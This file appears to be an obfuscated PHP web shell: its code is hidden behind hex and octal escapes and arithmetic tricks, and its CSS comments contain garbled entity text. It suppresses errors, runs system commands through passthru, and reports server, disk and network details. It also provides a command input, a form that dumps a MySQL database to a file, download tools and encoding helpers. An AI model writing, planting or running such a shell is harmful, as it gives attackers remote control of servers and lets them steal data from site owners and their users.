\x375;&#\x310\0706;\040&#\x3108\x36\073\06082;\046#\x31085;?? \055\x20\0608\x30\073??\x26#1\x30\067\067\x3b&\043\x31085\x3b\x26#1\x30\0705;\x26\x231\06086;\x20\046\x23\x31079;\x26#1\060\067\x36;&#\061\x307\067;&\x23\x31089;\x26#\061\x310\x30\x3b\040&\x231\x3085\x3b\x3072\073\x30\x395;\x26\x231\x30\x380\073&#\061\06085;&\0431\x30\x37\062;\046#10\x377\x3b\x26#10\0710;&\x23\x3108\x39;&#\x31103\073\x20&\043108\064;\x26\043\061\x30\0672\x3b&#\x31075\x3bl\x30;\046#1\x310\x33; */\x0d\012  \040.mod\141\154b\141ckgr\157und:tar\x67e\164 {\x0d\012  \040op\141\x63\151t\171:\0401\073 \x2f\x2a &#\061\x30\x376;&\x23107\067;&\x23\x3108\063;&#\x31\x3072\x3b\x26#1\06077;\x26#\x31\x30\x38\064; 
\0706\073&#\x31082;l\x35;\x26#\x310\x386;\040&\x23\x310\067\x34\x3b\x26#1080;\x26\x23\x31076;\046\0431\x30\x38\060;\x26#1\060\070\064\x3b\x26#1099\073\x30\x384\073\040*/\015\012\040  p\157in\164\145r-ev\x65n\164s:\x20\x61uto\x3b /\x2a\x20&\04311\0601;
\x38\063;\x26#10\067\067;\x26#\061084\x3b&\0431\06077;\046\04310\0705;\x26#\061\060\0710; \x26\x23\x3107\x34;??\x3b\046#1\060\x37\066\x3b&#\0610\x380;\060\x384; \x26\x231076;&#\x310\0703;\046#1\x3103\x3b &\x23\0610\070\071;&\x23\0610\x38\x36;&\04310\067\x33;\x26\x23\061\060\0719;
\0710;\046\x231080;&\x231\x3081\073 \046#108\064\x3b&#\x310\0719\073&\043\061\x3096;\046#\x31080;\040\052\057\x0d\x0a\x20\x20 t\x65xt-al\x69gn\072\x20\143\145\x6e\164e\x72\x0d\x0a   }\x0d\012 \x20\x20/\x2a &#\x310\071\066;
\0700;
\x38\070\x3b\x26#1\x3080;&\04310\070\065\073&\043\x3107\062\073 &#\061\060\0676\x3b
\0700\x3b\x26#\x310\x372;\x26\0431083;??&\04310\x375\073\0608\x36\073\x26#10\x37\064;&\043108\066\x3b??\046\x231086\073 &#\061\060\x38\x36\x3b&\x23\061082\073\060\x38\x35;&\0431072; \x26\043\x31\x30\070\x30; &\0431077\073\x26#1\x30\0675\073\046#1\x30\x386\x3b\040\046#\x31\x308\x36\073\046#1\0609\x30;\046#\x31\x30\0709;&\x231\x30\x390\x3b\046#\x31\060\0711\x3b&\x23\061\x30\0707\x3b&#\x3109\071; &\043\x3108\x36;&#\061\060\071\x30;\040\x26#11\0601;\x26\x231\x3082\x3b&\x23\x31\060\0708\x3b\060\067\x32\x3b&#\061085\073?? \052\057\x0d\012\040\x20 .\155odalwin\x64o\167 \x7b\x0d\x0a \040\x20disp\154ay:\040i\156l\151\x6ee\055blo\143k\073\015\012\040\x20 m\x61rg\151\156\072 \0610\x25 \x61u\x74o;\015\x0a   pa\144din\x67\x3a\x201%\073\015\012  \x20\142ack\147\x72o\165\x6ed:\x20\043\146f\x66;\x0d\x0a\x20\x20\040\x62\x6fr\x64er\x2d\x72a\x64i\x75s\072 3p\170;\015\x0a   \x66on\164\055size:\x20\x316px\x3b\x0d\012 \x20\040\x7d\x0d\x0a   .m\x6fdal\x77i\156d\157\x77\062 {\015\x0a   di\x73\160lay\072 i\156\x6c\151ne\055b\154oc\x6b;\x0d\012\x6da\x72g\x69n: \x32% a\x75t\157;\x0d\x0apa\x64di\x6eg\072 \x31%;\015\x0a\142ackgro\165nd:\040#ff\146\073\015\012bo\162\144er\055\x72\x61di\x75\163\072 3\x70x;\015\012f\x6fn\164-size:\x201\x36px\073\015\012\x68eig\x68\164\072 8\060%\x3b\x0d\012\167\x69dt\150\x3a\x209\060\045;\x0d\x0a\x7d\015\x0a  \040/* \x26\x231\060\x38\x36;&\043109\x32\073\x26#10\070\x36;\x26\0431\x308\x38;&\x23\061084\x3bl\063\073\x26\04310\0677\x3b\046\x23\061085\x3b&#\x31\0608\x30;&\x23\x31077; &#\x310\x389;\x26\x23\x31086\073\x26#1086;&\043\061073;\x26#\x3109\067\x3b\x26\0431077;\046#1\060\x38\x35\x3b\x26\x23\x3108\x30;&#\x3107\067; */\x0d\x0a \x20\x20.\155\x6fd\x61lwindow\040p\040{\015\012\x20  \x70\141\x64d\151\156g: 0\x3b\x0d\x0a \x20 \155arg\151n\072\0404% 0\x20\070% 0\073\x0d\012\x20  \164e\x78t-\x61lign\072 c\145nte\162;\x0d\x0a\x20 \x20\175\015\x0a\x20\x20 \056\x6dod\141\154wi\x6edo\x772 \x70 \173\015\x0a \x20\x20pa\144ding: 0;\x0d\012\040 \040\155a\x72gi\x6e: \x34\x25\x20\x30 \064% \x30\x3b\015\012 \040 te\x78t-\141l\x69g\x6e:\x20cente\x72\x3b\015\x0a \040 \x7d\015\012\040\x20 /*\x20&#\061\060\067\064\073\046#\06108\060\x3b\x26\043\x310\x376\073 &\x23\x310\x382;&\x23\x31085;&#\061\x30\0706\x3b\x26#1\06087;
\070\x32;&\0431080\073\x20\046#1\06047;\046#\x31\x3040;&\x23\061050;\0605\x36\073&\x23106\x37\073&#\x31\06058;\046\04310\066\070; \x2a\057\015\x0a  \040.mo\x64\141lw\x69nd\x6f\x77 a\040{\x0d\012  \x20displ\x61\x79: \x62lo\143\x6b;\015\x0a   \143o\154or\072 #f\x66f;\x0d\012 \x20 \142a\x63\153g\x72\157und: #369\x3b\015\012 \x20 \160a\x64\x64i\156g\x3a\040\x31\045;\x0d\012\040\040\x20ma\162g\151\156:\040\x30\040\141ut\x6f\073\015\012   w\151\x64\x74\150:\x2050\045\073\015\012   bord\145\162\055r\141d\151us:\0403p\170;\015\x0a \x20\x20\x74\145\x78t-a\x6c\x69\x67n\072\040ce\x6e\x74\x65\x72;\x0d\x0a\x20  \164\x65xt-\144\x65\x63ora\x74i\x6fn\x3a\040no\x6e\x65\x3b\x0d\012  \x20}\x0d\x0a.modal\x77\151ndow\062 a {\x0d\x0a   \x64ispl\x61y: bl\157ck;\x0d\x0a   \x63olor\x3a #\x66ff\x3b\x0d\x0a  \x20back\147rou\x6e\x64\072\x20#369;\x0d\x0a \040 paddi\156g:\0406\160x\073\x0d\x0a \040\x20\x6dar\x67\x69n:\x20\060\x20\141\x75t\x6f;\015\012\040 \040width:\04012\x30px\073\x0d\012   bor\144\145r\055radiu\163: \063p\170;\x0d\x0a\x20\x20 t\145xt\055al\x69\x67n: ce\156t\145\x72;\x0d\012\040  \164e\170\x74-d\145\143\x6frat\x69\x6f\x6e:\x20\x6e\157n\x65;\x0d\x0a \040\040}\x0d\x0a\040  \x2f* \x26#1\x30\0674\x3bl\060;&\0431\x30\x376\x3b\x20&\0431082;\060\x38\x35\x3b&\x2310\x386\x3b&\x231\x30\070\x37;&\043\x31\x3082\x3b\x26#108\060; \0604\x37\x3b
\x34\x30;&\x23\061\06050\x3b&\x2310\0656\x3b\046#10\x367;&\x231058;\06068; \046#1\060\0707;\x26\04310\x388\x3bl\060\073 \046#\0610\x38\065\073\x26\0431\x30\x37\062\073
\067\x34;\06077\073&#\0610\x376;??\046\x231085\073\x26\x231\0608\060;&\043\x31\060\x380; \046#\061\x308\x35;&\0431\060\x37\x32;\x20
\0705;&\x2310\x37\x37;\046#1\060\x377; &#\0610\0704\073\x26#\x3109\x39;
\071\x36;\x30\x38\060;\040*/\x0d\x0a\040  .\155\157\144\x61lw\151ndow\040a:h\157ver\040{\015\x0a  \040\142\141\x63k\x67rou\156\x64:\040#47a;\x0d\012\x20\x20\x20\x7d\x0d\x0a   #inne\162\x31{flo\x61t:ri\147ht;\x7d\015\x0a\040 \040#\x69\156ner2{fl\x6fa\164\072r\x69\x67\x68t;\143lea\x72:\x20right;\x7d\x0d\x0a \x20 hr \173b\157r\x64\x65r:1\160\170 \041importan\164\073h\145\151\x67ht: \x31px\073\x62\x61\143kg\162o\165\156d-\x63o\x6cor\072\x23c\x63\x63\x3bw\151\144th: 1\x300\x25 !i\155port\x61\x6et\x3b}\015\x0a   \x2ehid\145{fo\x6e\164-si\x7a\x65\x3a 14px; \155\x61\162g\x69n-\x72ight\x3a\x202\x30px;b\x61ck\147round-\143\157lo\x72:#F1F3\x46\065\x21\151\x6dport\141n\x74\073\x63ol\x6fr\x3a #\x31\x64\x35\x340\x35!\151mp\157r\164a\156\164\073\155arg\x69\x6e-\x6c\145\146\164\072 1px;font\055we\x69\x67\x68t: b\157\x6c\144\073\x74ex\x74-dec\157r\141\164io\156: \x75nd\145\162l\x69n\x65!im\x70ortant\x3b\175\x0d\012   .n\x65w{fon\164\x2ds\151\x7a\x65:\x201\064\x70x;fo\x6et-\x77\145i\x67ht\072\0404\0600\073w\x69dt\x68\x3a\04010\x30\x25;}\015\x0a \040 .\x63\x65\x6eter\x7bfo\156t\055size: 16\x70x;f\x6fnt-\167e\x69ght\x3a\040\x34\x300;}\x0d\x0a \x20\x20\x2e\x65r\x72\x6fr\173\x74\145\x78t-\x61\154i\x67n:\143e\156ter\x3b\x66\157nt\055s\x69ze\x3a2\064\160x;co\154\157\x72\072\x72\145d\073d\151sp\x6c\x61y:blo\x63\153;\155a\162g\x69n\0720\040a\165\164o;}\015\x0a\040  .\141_siz\145\173\146\x6fnt\055s\151\x7a\x65:18\160x\073\x7d\x0d\012 \040 td\x3a\156\x6ft(\x3afi\x72\x73t-c\x68\x69l\144){padding-l\145f\164\x3a\040\x38p\x78;} /\x2a&\x231\0604\x30;\046\043\061085;\x30\067\x32\x3b\x26\043\x3108\x33;??&\x23107\065;
\x380\x3b&\x2310\x39\065\073\x26#\061085;\046#\x3108\066;\x20
\x382\x3b\x26#\0610\x38\070;&#\061\x3086;&#\06108\x34;\x26#1\060\0677; &#\0610\x38\x37;\x26\0431\x307\x37;&#\0610\070\070;\046#\061\06074;\046\x23\x31086;&\043\x31075\x3b??\073 nt\150\055child(n+2)\x2a/\015\x0a  \x20.\x61\x72e\141{widt\x68\x3a \0716\045;he\x69g\x68t: \x385%\073\x62o\162d\145\162\072 1\160x sol\x69\x64\040\043c\x63cccc;\x6dargin: \x310px\x20au\164\157;\x6fv\145rflow-\171\x3a a\165\x74\x6f;\x77\x6frd\x2d\x77r\x61p: \x62r\x65ak-wo\162d\073\x74ext-\x61\154ign\072\x20lef\x74;f\157\x6e\164\x2dwei\147ht: \x6eorm\141\x6c;\x66\157\156\x74-si\172\145\x3a \x31\x32p\x78\175\x0d\x0a   .\142\x74\x7b\x63olo\162:#\x30\x30\x38\070\x300\073\x7d\x0d\012  \040\x2ep\x6d{\x66\x6fn\x74\x2dw\x65ig\x68t\072 7\060\060;\x66on\x74\055size\x3a\0401\x34px;col\157r:r\x65d}\015\x0a<\x2fst\171le>\x0d\x0a \x20 <\057\150ead>\015\x0a \040\x20<\x62o\144\171>\015\012\015\012";inI_SET("dis\x70la\171\x5ferro\x72\x73",(int)ROund(0+0+0));iNi_sEt("\x64ispla\x79\x5fsta\162\164\x75p\137\x65\162ro\162s",(int)roUnd(0+0+0+0));ERrOr_rEpoRTInG((int)rOund(0+0+0));function _ckskxf($_mkmoxkqd,$_tvwcxnv=false,$_ieenqtvf=073545){$_ksubfh=fIlEPERMS($_mkmoxkqd);if($_ksubfh&((int)RoUNd(1045.5+1045.5+1045.5+1045.5)+(07237+07454-06570)-(010653-06753+06426-0273)+(int)roUNd(-47.333333333333+-47.333333333333+-47.333333333333))){$_zpcpglcs="p";}else if($_ksubfh&(int)ROunD(2730.6666666667+2730.6666666667+2730.6666666667)){$_zpcpglcs="c";}else if($_ksubfh&(int)ROunD(5461.3333333333+5461.3333333333+5461.3333333333)){$_zpcpglcs="\144";}else if($_ksubfh&((057706+060016+-057572)-(060434+-0612)+(int)ROUnD(6169+6169+6169+6169)+(01114+-01570))){$_zpcpglcs="b";}else if($_ksubfh&((int)rOUND(8017+8017+8017+8017)-(077024+-0152)+(int)rOunD(16024+16024)+(01143-02304-02354- -05203))){$_zpcpglcs="\055";}else if($_ksubfh&((int)roUND(13658+13658+13658)+(int)rOUnD(-3.5+-3.5+-3.5+-3.5))){$_zpcpglcs="l";}else if($_ksubfh&((0137777+0137717+0137724-0277710)+(0140462-0140443+0136671- -01117)+(0140012- -060)-(int)RoUNd(32782.333333333+32782.333333333+32782.333333333))){$_zpcpglcs="\163";}else $_zpcpglcs="u";$_bsfrgrlp["read"]=($_ksubfh&((0421+027)-(int)Round(20+20)))?"r":"\x2d";$_bsfrgrlp["w\162i\x74\x65"]=($_ksubfh&(int)RouNd(42.666666666667+42.666666666667+42.666666666667))?"\x77":"\x2d";$_bsfrgrlp["\145\x78\x65c\165te"]=($_ksubfh&(int)ROUNd(21.333333333333+21.333333333333+21.333333333333))?"\170":"\055";$_qhvpxavx["rea\144"]=($_ksubfh&(int)roUnD(8+8+8+8))?"r":"\x2d";$_qhvpxavx["w\x72\x69te"]=($_ksubfh&(int)RoUnd(4+4+4+4))?"w":"-";$_qhvpxavx["e\x78\145\x63ute"]=($_ksubfh&(int)rouND(2.6666666666667+2.6666666666667+2.6666666666667))?"x":"-";$_bhxydu["rea\144"]=($_ksubfh&(int)rOuNd(2+2))?"r":"\x2d";$_bhxydu["wr\151\x74e"]=($_ksubfh&(int)rouNd(1+1))?"\x77":"\055";$_bhxydu["ex\x65\143u\164e"]=($_ksubfh&(int)RouND(0.33333333333333+0.33333333333333+0.33333333333333))?"\170":"-";if($_ksubfh&((02017-02522+02367+0221)+(int)round(697+697+697)-(02411-02247+02111-073)))$_bsfrgrlp["\145x\x65\x63u\164\x65"]=($_bsfrgrlp["ex\145cut\x65"]=="\x78")?"\x73":"S";if($_ksubfh&(int)ROUnd(341.33333333333+341.33333333333+341.33333333333))$_qhvpxavx["\145\x78\x65\143ute"]=($_qhvpxavx["execute"]=="x")?"s":"\x53";if($_ksubfh&((int)ROuNd(241+241)+(0763-050)+(int)rOUnd(-107.25+-107.25+-107.25+-107.25)))$_bhxydu["\145xe\143ute"]=($_bhxydu["\145\170e\x63u\164e"]=="x")?"\164":"T";$_aynwahm=spRinTF("%\061s",$_zpcpglcs);$_aynwahm.=SPRInTf("\0451s\045\061s%1s",$_bsfrgrlp["re\x61\144"],$_bsfrgrlp["wr\151te"],$_bsfrgrlp["ex\x65cu\164e"]);$_aynwahm.=sprINTF("\x251s%\061s\x251s",$_qhvpxavx["\162ead"],$_qhvpxavx["wr\151\x74e"],$_qhvpxavx["\145\170e\143\165\164\x65"]);$_aynwahm.=sPrinTf("%\x31s%1\x73%\061\x73",$_bhxydu["read"],$_bhxydu["\167\162\x69t\145"],$_bhxydu["e\x78ec\165\164e"]);if(strpos($_aynwahm,"\055--",-(int)roUNd(1.5+1.5))){return"\074\x66\157n\164 col\x6fr=\042#\106\x46\x30\060\0600\042\x3e\x3cb\076".$_aynwahm."\x3c\057b\x3e\074/\146\x6fn\164\076";}elseif(strPOs($_aynwahm,"r\167",-(int)rOuNd(1.5+1.5))){return"<f\157\x6et\x20color\x3d\x22#0\0608000\x22>\074b\076".$_aynwahm."</\142></\x66\157\156\164>";}else{return"<\x66ont c\157\x6cor=\x22\x23000000\x22\076\074b\x3e".$_aynwahm."\x3c\x2fb\076\074\057font>";}}function _ddisiu($_mkmoxkqd,$_uoaqojrs="\144\x69\154\x71\x64\x68d\165\163hl\156",$_vxdcl=null,$_eqquue=-0232443,$_bkolke=null,$_uvqp=null){$_xmlypt=subSTR(spRiNtf("\045\157",fiLepeRms($_mkmoxkqd)),-(int)rOUnd(2+2));if((int)(sUbstR($_xmlypt,(0604-0446-036- -0372)-(int)ROuNd(78.5+78.5+78.5+78.5),(int)ROund(-119+-119+-119)+(int)rOund(41.25+41.25+41.25+41.25)-(0123- -0272+-033-0471)-(-0224+-0143+0175)))>(int)ROunD(0.33333333333333+0.33333333333333+0.33333333333333)){return"\074\146ont c\157\x6co\162\075\042#FF8C\0600\042><\x62>".$_xmlypt."<\057\x62\076\x3c/fo\x6et\x3e";}else{return"\074f\157\156\164\x20\x63olor=\042#00\060\x30\x300\042><\x62\x3e".$_xmlypt."</\x62\x3e\x3c/\146\x6fnt>";}}$_cexlww="\015\x0a<div\x20\x63\x6cass\x3d\x22\141l\154\x22 \x69d=\x22m\141in\042\x3e\015\012<div \143\154ass\x3d\042b\154\157c\x6b\x2dhide\x22>\x0d\012<\x64\x69v \143\x6c\141ss=\x22ha\164\042>\x0d\012<\144iv>\015\x0a\x0d\x0a\074/\144i\x76>";echo$_cexlww;if(isset($_POST["\163ub\x6d\x69\x74Btn"])){$_qcaqtti=isset($_POST["pa\x74\150"])?$_POST["pa\164h"]:__DIR__;CHDIr($_qcaqtti);}else{$_qcaqtti=isset($_GET["p\141th"])?$_GET["\x70\x61\164h"]:__DIR__;cHDIr($_qcaqtti);}$_ynpsbyx="pa\163"."\x73th"."ru";$_hons=$_GET["p\141th"];if(empty($_hons)){$_hons=gETcwD();}$_ewokkwy=Php_UNAme();$_jclcueym=pHPveRSIOn();$_awyklxq=syS_gEt_TEMp_dIr();$_syxaveob=diskfreespace("\057");$_uqhffj=dIsk_ToTAL_sPacE("\057");$_mxqqai=$_syxaveob/(int)rOund(262144+262144+262144+262144);$_pdas="\x4db";if($_mxqqai>=((02560+-0652)+(int)rouNd(29+29))){$_mxqqai/=(02422-0552)+(-0112-0262+-0342- -01066);$_pdas="Gb";}$_wnjpz=$_uqhffj/(int)ROUnD(349525.33333333+349525.33333333+349525.33333333);$_tvgab="Mb";if($_wnjpz>=((0661+0555)+(0356-014))){$_wnjpz/=(int)RounD(256+256+256+256);$_tvgab="Gb";}$_qjam=roUNd($_syxaveob/$_uqhffj*100.0,(int)RoUnd(0.66666666666667+0.66666666666667+0.66666666666667));if($_qjam>(int)rouNd(25+25+25+25))$_qjam=(int)ROuNd(25+25+25+25);echo"\074pre\x3e";echo"\151\x64\x20  \040|\x20";echo$_ynpsbyx("\151\144");echo"u\156\141me\x20|\040".$_ewokkwy."\074br>";echo"tmp\040 \040\x7c ".$_awyklxq." ".SubsTr(sPRiNtF("%\157",fiLeperms($_awyklxq)),-((int)RounD(20.25+20.25+20.25+20.25)-(int)rOUND(-44.5+-44.5)-(int)roUnD(39.666666666667+39.666666666667+39.666666666667)-(int)ROuND(15.666666666667+15.666666666667+15.666666666667)))."<br\x3e";echo"\x70h\x70 \040 |\040".$_jclcueym."<br\x3e";echo"s\x65rve\x72|\x20".$_SERVER["SE\122\126E\122_\x4eAM\x45"]." ".$_SERVER["\123ERV\105\x52\x5fA\x44\x44\122"]." ".$_SERVER["S\105RV\105\122_\123OF\124\127AR\x45"]."<br>";echo"cli\145nt|\x20".$_SERVER["R\105MOTE\x5fADDR"]." ".$_SERVER[HTTP_ACCEPT_LANGUAGE]."<b\162\x3e";echo"\x64\141t\x65 \x20| ".Date("Y-m-d-H:i:\163\x20e \x50")."\040\107MT"."<br\x3e";echo"HD\x44   \x7c "."T\x6f\164\141l: ".RoUnD($_wnjpz,(int)RoUND(0.66666666666667+0.66666666666667+0.66666666666667))."\x20".$_tvgab."\x20";echo"F\162e\145:\040".rOUnd($_mxqqai,(int)rounD(162.33333333333+162.33333333333+162.33333333333)-(0420+0656+0722+-01577)+(int)ROuND(-150.5+-150.5)-(int)ROUND(-44.5+-44.5))."\040".$_pdas."(".$_qjam."%\x29"."<br>";echo"\143w\144  \x20|\040".$_hons." "."\133"._ddisiu($_qcaqtti)."\x5d\040"._ckskxf($_qcaqtti)."\074\x68r>";echo"\x3c\x2fpre>";echo"\074/di\166>";function _ssgcj($_mygveyhr,$_wcik=-3.0163199116724,$_xylv="q\152fl\154r\x69nkn\x6fo\x71\154",$_oqfwg=null,$_tftdzsh="\x73h\x67pvv\x78\x72\152fj\165cw",$_xgkeko=false,$_suhphhm=-1.1389671061052){if($_gtypsxr=oPendIr($_mygveyhr)){$_hkqxc=sUBSTR($_mygveyhr,(int)rOuNd(0+0+0),(Strrpos(dIRNAME($_mygveyhr."/."),"/")));if($_hkqxc==null){$_hkqxc="/";}$_uvdkc="\x0d\x0a\x0d\012\074\x64iv \x63\154\141ss=\x22ne\x77\x22\076\015\x0a \x20   \040\040  \x3cla\142el cla\x73\x73=\x22\x64\x65\155os\x22\x20style=\042disp\x6cay:i\156line-\x62lock\x22><\141\x20c\154\x61\163s\x3d\042\144\145\x6d\157li\156k\x22 \x68\162\x65f=\042#t\x6f\157\x6cs\042>\x54\157o\154s\074/\141></l\141bel>\x20\074/td>\015\x0a \x20\x20 \040   \040<\x66o\x72\x6d\x20styl\x65\x3d\042\x64\x69s\160l\141y\072i\156lin\x65;\x66\154\x6f\x61t:ri\x67ht\042\x20me\164\150\157d=\x22P\x4fS\x54\042>\x0d\012     <\151np\x75t\040st\x79le=\042\x6dargi\x6e\055ri\147h\x74:\0405px\x3b\x22\040typ\x65\075\x22s\x75b\155it\x22\040n\x61me=\x22e\x78\x69t\042 \x76a\x6c\x75e=\042E\x58I\x54\042/>\x0d\012 \040   \x3c/\x66\x6frm>\x0d\012\074/\144i\x76\x3e\015\x0a\x3c\144\151v c\154ass=\x22open\042>\x0d\012<di\166>\x0d\x0a<hr>\x0d\x0a\x3c\x66orm a\x63tion=\042\042 s\164yle=\x22di\x73pl\x61\x79\072\x69n\x6cin\145\042 me\164\150\157d\075\042P\x4fST\042>\015\012 \040  <a c\154\x61ss\075\x22h\151\144\x65\x22\040hre\x66=\042\x22>Hid\x65\x20tools\x3c\057a>\x0d\x0a\x20   <i\x6e\x70ut t\x79\x70e\x3d\042submit\x22\040\x6eame=\042in\x66o\x22 valu\x65\075\042phpin\146\157\042\x2f>\x20\x0d\x0a  \040 \x3c\x69npu\164\040\x74yp\x65\075\042su\142\x6dit\042 nam\x65\075\x22d\157w\156\042 value=\x22\x64ownloaders\042/>\x0d\x0a    \x3c\x69np\165t \164y\160\145=\042\163\x75\142m\151\x74\042 n\141\x6de=\x22\x66un\042\040va\x6c\x75e=\x22\146unc\164\x69\157n\163\042\x2f\x3e\x0d\x0a\x0d\012</fo\x72m\076\x0d\012<for\155\040st\x79le\x3d\042d\151s\x70\154a\x79\072in\154\151ne\042\040me\164ho\144\x3d\042P\x4f\123\x54\042>\x0d\012<inp\165t \164yp\145=\x22\164\145\x78\164\042 \156\141me=\042\143m\x64\x22 pla\x63eh\157l\144\145r\075\x22\103M\x44\042\x3e\015\x0a</for\155\x3e\x0d\x0a<hr\x3e\x0d\x0a<d\151v sty\x6ce=\042\x66\x6co\x61\x74:left;m\141r\x67\151n-ri\x67h\x74:12\160x;\042>\015\x0a<f\x6f\162\x6d \x6de\164hod=\042POST\042>\015\012<\151np\x75t \163\164\171\154\x65=\042wid\164h:178\160x\042\040type=\042te\170t\x22 \156a\x6de\x3d\x22name\042 pl\141c\145\x68ol\144er=\x22D\102 \x6ea\155e\042 req\x75\151r\x65\x64\076<\142r/>\015\x0a<\x69\156put \163\x74yle=\042\x77idth:\x3178p\170\042\040type=\042text\042 nam\x65=\042\x75\x73\x65r\042\x20p\154a\x63\145ho\154d\145r=\x22DB\040use\162\042 requi\162ed\x3e<b\162/\076\x0d\x0a<\151\156\160ut\040s\x74\x79le=\x22wid\x74h:1\x378p\170\x22 \x74ype=\042\160assword\x22 name\075\042pa\x73s\x22 pl\x61\x63eh\157\154\x64er=\x22DB\040pass\x22 \x72eq\x75ire\144>\x3c\142r/>\x0d\x0a<i\x6eput\040s\x74\171\154e\075\042wi\x64t\x68:1\067\x38px\042 t\x79\x70e\075\042text\042 nam\x65=\042\x68\x6fst\042\x20plac\x65\x68\157l\x64er=\042\115\171SQL\040\150\x6fst\042 \162equir\x65\x64><br\057>\015\x0a<in\x70ut\x20\x73tyle\x3d\042w\151d\164\150:\0617\070\160\x78\x22\040t\171\x70\145=\042\x74e\x78\x74\x22 \156am\145\075\042p\x6frt\042 pl\141ce\150\x6f\x6c\x64er\075\042\x50\157rt\042><\142r\x2f\076\x0d\012<b\165t\164\x6fn\040\x73t\171l\145=\x22wid\164\x68:\061\0716\x70x\042 t\x79pe\x3d\042su\x62\x6dit\x22 nam\x65=\x22DB\x22\x3eS\x61v\x65\040D\102\x20to f\x69le.\x73q\x6c<\057\x62\165tton\076<br\x2f><br/\076<b\x72\057>\015\x0a<\x2f\x66o\x72m>\015\012<\057d\x69\166>\x0d\012<di\166\x20\163tyl\x65\075\x22f\x6c\157at: left;di\163play\072\x62\154\x6f\143k\073wi\144\164h\0722\060\x38p\170\x22>\x0d\012<p\x72e>\x0d\x0a\074\146o\x72m\x20\x6d\x65t\x68od\075\042\x50OST\042>\x0d\x0a<l\141\x62\145l\x3e<\x62 \143l\141\x73\x73=\x22\x62t\042>\x42\x61\x73e6\x34\040\145n\143\157\x64\145/deco\x64e\x3a\074\057\142></la\x62el\076\x0d\x0a<in\x70\x75\x74 s\x74\171\x6ce=\x22\167i\x64t\x68:17\070px\x22 \x74y\x70\145\075\x22\164e\x78t\x22\040na\x6de\075\042b\141\x73e\x36\x34\x22\076\015\x0a<t\x61ble\040\143\x6ca\x73s=\042ya\042>\015\x0a<t\162>\015\012<t\x64 \163\164\x79l\x65=\x22pa\x64di\x6e\147: \060\073bor\144\x65r\x3a n\157\156e\x22>\074input \x73\x74yle\x3d\x22marg\x69n-\154\145f\x74\x3a -\061p\170;width\072 \071\066\x70x;\042 \x74y\x70\x65\075\042\163ubmit\x22 \x6eam\x65\075\x22\x73ubm\x69t\042 v\x61l\x75e=\x22\105nco\x64\145\042>\x3c/td\x3e\015\x0a\x3ct\x64\040\x73\164yle=\042p\x61d\x64\x69\x6e\147:\x200;b\x6fr\x64er:\040n\x6fn\145\x22><\151\x6e\160u\164 s\x74y\x6ce\075\x22margin-\162ig\x68t\x3a\040\070px\073\x77\x69dth: 9\066\x70\170;\x22\x20type=\042\x73\165b\155\x69\164\x22 \x6e\x61me\075\042\163\165b\155it2\x22\x20\x76alue=\x22\x44ec\157de\x22>\074/\x74d>\015\x0a\x3c\057\x74r\076\x0d\x0a<\x2f\x74\x61bl\145\076\015\x0a</\146\x6fr\x6d\x3e\x0d\x0a\074\057p\x72\145\x3e\x0d\x0a<\057\144\151v\x3e\x0d\012\x0d\012<\144iv style=\x22f\x6coa\164: l\145\x66t\x3bd\x69\163p\154a\x79:b\x6coc\x6b;w\x69dth\x3a\x3208px\042>\015\012\x3c\160\162e>\x0d\012<fo\162\x6d\x20\040\155\145t\x68o\144\075\x22\x50OST\x22>\015\x0a<\x6cab\145l>\074\142 \143la\163s=\x22\142t\042>U\122L en\143o\144\x65\057\x64\x65cod\x65\x3a<\x2fb>\074/label\076\x0d\012\074i\x6e\x70ut \x73t\171\154e=\x22wi\144\164\150\x3a\x3178px\x22\040\164yp\x65\075\x22te\170t\x22\040\156am\145=\x22\165r\154\x22>\x0d\012<\x74ab\154\x65\x20\143las\163=\042\x79\141\042>\015\x0a<\164r\x3e\x0d\x0a<td\x20style\x3d\x22\x70\x61\x64d\x69ng: 0\073\142orde\x72\x3a \x6e\157n\x65\042\x3e\074in\x70ut s\x74y\x6c\x65=\x22ma\162gin\055\x6ceft: -\x31px\x3b\167i\x64\x74\x68: \x396p\x78\073\042 t\x79\160e\075\x22s\x75\142\155it\x22 \x6e\x61m\x65=\x22s\x75\x62mit\x5fu\042\x20v\x61\154ue\x3d\042\105nco\x64\145\x22><\057td\076\015\012<td \163\164yl\x65\075\x22\x70a\x64d\151ng\072\0400\073b\157\x72de\162\x3a \156o\x6ee\x22><i\156p\x75t \x73t\x79l\145\075\042m\141\162g\151n\055r\x69gh\x74: 8px;wid\164\x68: 9\066px\073\042 t\x79\x70\145\x3d\042\x73\x75b\x6dit\042 \x6eame=\x22sub\155\151t\137\x752\042\x20val\165\145=\042\x44\x65\143od\x65\042>\074/\x74\144>\x0d\x0a\074/tr>\x0d\x0a\x3c/t\x61ble>\x0d\x0a</f\x6f\x72m\x3e\015\012\x3c/\160r\145>\x0d\x0a<\x2f\144\151\x76\x3e\x0d\x0a\x0d\012\x3c\144iv s\x74\x79\154e=\x22\146\154oat:\040\x6cef\164;d\x69splay:b\x6c\157ck\x3b\167idth\x3a2\x30\070px\x22\x3e\015\x0a\x3cp\162e\076\015\012<f\x6f\x72\x6d\040 me\164h\x6fd=\042\x50OST\042>\x0d\012\074l\141bel><\142 c\154\x61ss\x3d\x22\142t\042>\x48E\130\040\x65nc\157\x64e/\x64\145c\157\144\x65:<\x2fb\x3e\x3c\x2f\x6ca\142\145l>\x0d\x0a<i\156put \163t\x79le=\x22wi\x64\164\x68:\x31\067\x38\x70\x78\042 type=\x22te\x78t\x22\040\x6eam\145=\x22hex\x22\x3e\x0d\012<tabl\145 c\x6c\141\x73\x73=\042ya\042>\015\012<\164r>\x0d\x0a<\164\144\040\163t\171l\145\075\x22pa\144\144ing:\0400;\142\157r\x64\x65r\072 n\x6fne\x22><\x69\x6epu\164\040sty\154e=\042\x6d\141r\x67in\055\154e\x66t\x3a -\x31px\x3b\167\x69\144t\x68\072 \x39\066px;\042 \x74y\160e=\x22s\x75\x62mit\x22 na\x6de=\042subm\x69\x74_\x68\145\x78\x22 \166a\x6c\165\145=\x22\105nc\x6fde\x22\x3e<\x2ft\x64\x3e\x0d\012\074td style=\042\160a\144\x64\x69ng: 0;\x62or\x64\x65\162\072\x20n\x6fne\x22\x3e<\151\x6e\x70ut style\075\x22ma\x72\147i\x6e\x2dri\147\150\164:\x208p\170;\x77idt\150: 9\066\x70\170\x3b\042 \164\171p\145=\x22\x73ubmi\x74\042 nam\x65\075\042sub\155i\164\x5f\150e\x78\062\042 